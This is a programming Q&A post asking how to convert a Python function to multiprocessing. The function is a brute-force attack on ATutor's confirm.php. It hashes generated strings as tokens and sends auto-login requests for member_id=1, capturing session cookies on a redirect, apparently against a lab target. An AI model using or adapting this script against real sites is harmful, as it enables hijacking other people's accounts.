# Converting Existing Python3 Method to Use Multiprocessing

Tags: python-3.x, python-requests, multiprocessing

I have a method that iterates through a load of values and send a `requests` call for each. This works fine however it takes a LONG time. I want to speed this up using `multiprocessing` in `Python3`.

My question is what is the correct way to implement this using multiprocessing so I can speed up these requets?

The existing method is as so:

```
def change_password(id, prefix_length):
    count = 0
    # e = None
    # m = 0
    for word in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length))):
        # code = f'{word}{id}'
        h = hash_string(word)[0:10]

        url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
        print(f"Issuing reset request with: {h}")

        proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

        s = requests.Session()
        res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})

        if res.status_code == 302:
            return True, s.cookies, count
        else:
            count += 1
    return False, None, count
```

I have tried to convert it based on the first example in the Python3 docs [here](https://docs.python.org/3/library/multiprocessing.html) however it just seems to hang when I start the script. No doubt I have implemented it wrong

```
def send_request(word):
    # code = f'{word}{id}'
    h = hash_string(word)[0:10]

    url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
    print(f"Issuing reset request with: {h}")

    proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

    s = requests.Session()
    res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})

    if res.status_code == 302:
        return True, word
    else:
        return False
```

It is being called from a modified version of the original method as so:

```
def change_password(id, prefix_length):
    count = 0
    # e = None
    # m = 0
    words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
    with Pool(10) as pool:
        results, word = pool.map(send_request, words)
        if results:
            return True, word
```